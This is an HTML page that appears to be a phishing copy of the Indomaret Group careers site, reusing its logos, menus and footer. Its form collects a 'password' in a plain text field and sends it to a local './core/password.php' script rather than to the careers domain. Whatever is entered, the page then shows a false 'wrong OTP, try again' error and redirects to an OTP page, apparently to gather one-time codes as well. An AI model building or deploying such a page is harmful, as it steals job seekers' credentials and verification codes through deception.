<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, 
        user-scalable=0" name="viewport">
    <link rel="icon" type="image/vnd.microsoft.icon" href="https://files.indomaretgroup.com/images/favicon.ico">
    <link rel="stylesheet" href="https://career.indomaretgroup.com/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css?family=Montserrat+Alternates:bold" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous">
    <link href="https://career.indomaretgroup.com/css/select2-bootstrap4.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.6-rc.0/css/select2.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/flatpickr/dist/flatpickr.min.css">
    <style>
        .bd-callout {
            line-height: 32px;
            padding: 0.75rem;
            margin-top: 0.25rem;
            margin-bottom: 0.25rem;
            border: 1px solid #eee;
            border-left-width: .25rem;
            border-radius: .25rem;
        }

        .bd-callout-info {
            border-left-color: #5bc0de;
        }

        .office-button {
            font-size: 1.1em;
        }

        .modal-dialog-centered {
            display: flex;
            align-items: center;
            min-height: calc(100% - 1rem);
            /* Adjust the min-height as needed */
        }

        .modal-content {
            width: 100%;
            max-width: 600px;
            /* Set a max-width if desired */
            margin: auto;
        }
    </style>

    <link rel="stylesheet" type="text/css" href="./style/app.css">

    <title>Career Indomaret Group</title>

    <style>
        .notification {
            font-family: sans-serif;
        }

        .notification-text {
            color: red;
        }

        @media only screen and (max-width: 768px) {
            .notification {
                font-size: 0.75rem;
            }
        }

        @media only screen and (min-width: 769px) {
            .notification {
                font-size: 1.17rem;
            }
        }
    </style>
</head>

<body>

    <div id="loading" style="position:absolute; width: 100%; height: 100dvh; place-items:center; background-color: rgba(0,0,0,.7); z-index: 9999;">
        <img src="https://career.indomaretgroup.com/img/logo.png" class="pulse" width="150" />
    </div>

    <nav id="navbar-top" class="text-center navbar sticky-top navbar-dark bg-black">
        <div style="position:static;
            top: 10px;
            left: 0;
            right: 0;
            margin-left: auto;
            margin-right: auto;
            padding-left: 10px;
            padding-right: 10px;
            margin-top: 2px;
            margin-bottom: 2px;
            z-index: 2;
            background-color: #ffdd57;
            border-radius: 50px;">
            <div class="notification">
                <b>
                    <span class="notification-text">
                        <i class="fa fa-exclamation-triangle"></i> PERHATIAN
                    </span>
                    Seleksi penerimaan karyawan INDOMARET GROUP tidak dipungut biaya apapun selama proses rekrutmen berlangsung.
                </b>
            </div>
        </div>
        <div class="container navbar-expand-lg">
            <a class="navbar-brand" href="index.php">
                <img src="https://career.indomaretgroup.com/img/logo.png" style="max-height: 50px;">
            </a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample07" aria-controls="navbarsExample07" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>

            <div class="collapse navbar-collapse" id="navbarsExample07">
                <ul class="navbar-nav ml-auto">
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com">Home <span class="sr-only">(current)</span></a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/company">Company</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/testimony">Testimony</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/jobs">Job Vacancy</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/faq">F.A.Q</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/contact">Contact</a>
                    </li>
                </ul>
            </div>
        </div>
    </nav>
    <div id="wrapper">
        <a href="#" id="scroll" style="display: none;"><span></span></a>
        <div class="background-image" style="background-image: url('https://career.indomaretgroup.com/img/background-form.jpg');">
            <div class="container pt-5 pb-5 row mx-auto">
                <div class="d-none d-md-block col-md-2 pt-5 pb-5 col-md-offset-1 text-center">
                    <img src="https://career.indomaretgroup.com/img/heart.png" class="big-heart">
                </div>
            </div>
        </div>

        <form id="checkNikForm">
            <div class="container-fluid" id="content">
                <div class="container pt-4">
                    <div class="section mb-4">
                        <h3 class="header text-center">
                            <br>
                            <span class="light-blue">Input</span> Password
                        </h3>
                    </div>

                    <div class="row form-group mt-3 has-feedback">
                        <div class="offset-lg-2"></div>
                        <div class="col-lg-7">
                            <div class="row form-group has-feedback">
                                <label for="password" class="col-md-4 col-form-label"><b>Password (Optional)</b></label>
                                <div class="col-md-8 p-0 text-center">
                                    <input class="form-control number" required="required" name="password" type="text" id="password" data-bv-field="password"><i class="form-control-feedback" data-bv-icon-for="no_ktp" style="display: none;"></i>
                                    <small class="help-block" data-bv-validator="notEmpty" data-bv-for="password" data-bv-result="NOT_VALIDATED" style="display: none;">Silahkan masukkan Password</small><small class="help-block" data-bv-validator="integer" data-bv-for="no_ktp" data-bv-result="NOT_VALIDATED" style="display: none;">Nomor KTP tidak valid</small><small class="help-block" data-bv-validator="stringLength" data-bv-for="no_ktp" data-bv-result="NOT_VALIDATED" style="display: none;">Jumlah digit tidak valid</small>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="text-center mb-4">
                        <button type="button" class="btn btn-info btn-sm pl-4 pr-4" onclick="checkApplyNIK()">Kirim <i class="fas fa-paper-plane"></i></button>
                    </div>
                </div>
            </div>
            <div class="offset-lg-1"></div>
        </form>
    </div>

    <div class="modal fade" id="confirmationModal" tabindex="-1" role="dialog" aria-labelledby="confirmationModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-body text-center">
                    <h3 style="color:black"><b>Halo Selamat datang kembali</b></h3>
                    <br>
                    <span id="message"></span>
                </div>
                <div class="modal-footer justify-content-center">
                    <button type="button" class="btn btn-primary custom-btn-width" onclick="responseYes()">Ya</button>
                    <button type="button" class="btn btn-danger custom-btn-width" onclick="responseNo()">Tidak</button>
                </div>
            </div>
        </div>
    </div>

    <div class="modal fade" id="confirmationModal2" tabindex="-1" role="dialog" aria-labelledby="confirmationModalLabel" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="modal-body text-center">
                    <span id="message">
                        <p>Dengan memilih memperbarui lamaran, Anda harus mengisi kembali data alamat, institusi pendidikan, jurusan, pengalaman kerja, info lowongan dan upload foto.
                            <br><br>
                            Apakah Anda yakin?
                        </p>
                    </span>
                </div>
                <div class="modal-footer justify-content-center">
                    <button type="button" class="btn btn-primary custom-btn-width" onclick="submitForm()">Ya</button>
                    <button type="button" class="btn btn-danger custom-btn-width" onclick="responseNo2()">Tidak</button>
                </div>
            </div>
        </div>
    </div>


    <footer>
        <div class="container pt-3">
            <div class="row align-items-center">
                <div class="col-12 col-md-4 pt-2 pb-2" id="footer-title">
                    Drive Your<br>
                    Bright Career<br>
                    Into a Legacy<br>
                </div>
                <div class="col-12 col-md-4">
                    <div class="row pt-2 pb-2">
                        <div class="col-3 col-sm-3 col-lg-2 pr-0">
                            <img src="https://career.indomaretgroup.com/img/heart.png" class="footer-heart">
                        </div>
                        <div class="col-9 col-sm-9 col-lg-10 pl-0">
                            <p class="footer-head-office mb-0">Head Office
                                <a target="_blank" class="float-right" href="https://www.google.com/maps/place/PT+Indomarco+Prismatama+PIK/@-6.1094662,106.738388,17.5z/data=!4m12!1m6!3m5!1s0x0:0x7be66be81fee4a97!2sIndomarco+Prismatama!8m2!3d-6.1258757!4d106.8146644!3m4!1s0x0:0xb8d0d77801b4a430!8m2!3d-6.110157!4d106.7392697?hl=en-US">
                                    <i class="fas fa-location-arrow maps" title="Buka dengan Google Maps"></i>
                                </a>
                            </p>
                            <p class="footer-address">Gedung Menara Indomaret<br>Jl. Boulevard Pantai Indah Kapuk, Kamal Muara, Penjaringan<br>Jakarta Utara 14470<br> Telp. (021) 50897400</p>
                        </div>
                        <div class="mt-2"></div>
                    </div>
                </div>
                <div class="col-12 col-md-4 mb-3">
                    <h4>
                        <span class="font-weight-bold float-right">Stay <span class="light-blue">Connected</span></span>
                    </h4>
                    <div class="clearfix"></div>
                    <div class="row mt-3 mb-6">
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                            <a href="https://www.instagram.com/career_idmgroup/" target="_new">
                                <div class="thumbnail">
                                    <img src="https://career.indomaretgroup.com/img/circle-2.png" class="img-responsive small-circle">
                                    <div class="flying-caption">
                                        <i class="fab fa-instagram social-media-icon"></i>
                                    </div>
                                </div>
                            </a>
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                            <a href="https://www.linkedin.com/company/career-indomaret-group" target="_new">
                                <div class="thumbnail">
                                    <img src="https://career.indomaretgroup.com/img/circle-2.png" class="img-responsive small-circle">
                                    <div class="flying-caption">
                                        <i class="fab fa-linkedin-in social-media-icon"></i>
                                    </div>
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>

    <style>
        .btn-line {
            display: flex !important;
            margin-top: 22px !important;
            margin-left: auto !important;
            margin-right: auto !important;
        }
    </style>
    <script src="https://code.jquery.com/jquery-3.3.1.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
    <script src="https://career.indomaretgroup.com/js/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

    <script src="https://d.line-scdn.net/r/web/social-plugin/js/thirdparty/loader.min.js" async="async" defer="defer"></script>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.5/js/select2.full.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/flatpickr"></script>
    <script src="https://career.indomaretgroup.com/js/bootstrap_validator.min.js"></script>
    <script>
        const loading = document.getElementById('loading')
        loading.classList.add('hidden-loading');

        function checkApplyNIK() {
            checkReapply = false;
            const password = document.getElementById('password').value;

            loading.classList.remove('hidden-loading');
            loading.classList.add('show-loading');

            $.ajax({
                method: "POST",
                url: './core/password.php',
                data: {
                    password: password
                },
                success: () => {
                    loading.classList.add('hidden-loading');
                    alert('Otp yang anda gunakan tidak sesuai, sehingga lamaran anda belum berjasil. Silahkan coba kembali')
                    document.location.href = "./otp.php";
                }
            });
        }

        function responseYes() {
            $('#confirmationModal').modal('hide');
            $('#confirmationModal2').modal('show');
        }

        function responseNo() {
            no_ktp = document.getElementById('no_ktp').value;
            window.location.href = "https://career.indomaretgroup.com/no-reapply?no_ktp=" + no_ktp;
        }

        function responseNo2() {
            $('#confirmationModal2').modal('hide');
        }
    </script>
    <script defer="" src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon="{&quot;rayId&quot;:&quot;8bf5a887fca43e1d&quot;,&quot;serverTiming&quot;:{&quot;name&quot;:{&quot;cfL4&quot;:true}},&quot;version&quot;:&quot;2024.8.0&quot;,&quot;token&quot;:&quot;001593d2394e4e62aa395a2b910cbbf1&quot;}" crossorigin="anonymous"></script>


</body>

</html>